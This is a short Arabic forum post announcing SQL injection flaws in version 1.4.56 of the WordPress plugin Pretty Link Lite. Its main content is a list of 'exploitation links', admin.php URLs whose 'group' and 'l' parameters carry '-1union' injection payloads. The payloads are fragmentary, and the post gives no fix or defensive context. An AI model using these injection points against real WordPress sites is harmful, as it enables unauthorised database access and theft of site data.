ثغرة جديدة في WordPress من نوع Multiple SQL Injection


ثغرة جديدة في WordPress من نوع Multiple SQL Injection

الثغرة في الـ Plugin التالي :
WordPress › Pretty Link Lite « WordPress Plugins

الإصدار المصاب : 1.4.56 (لم تتم التجربة الإصدار الجديد )

روابط الإستغلال:

كود PHP:
كود:
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group =-1union http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1u nion http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group= -1union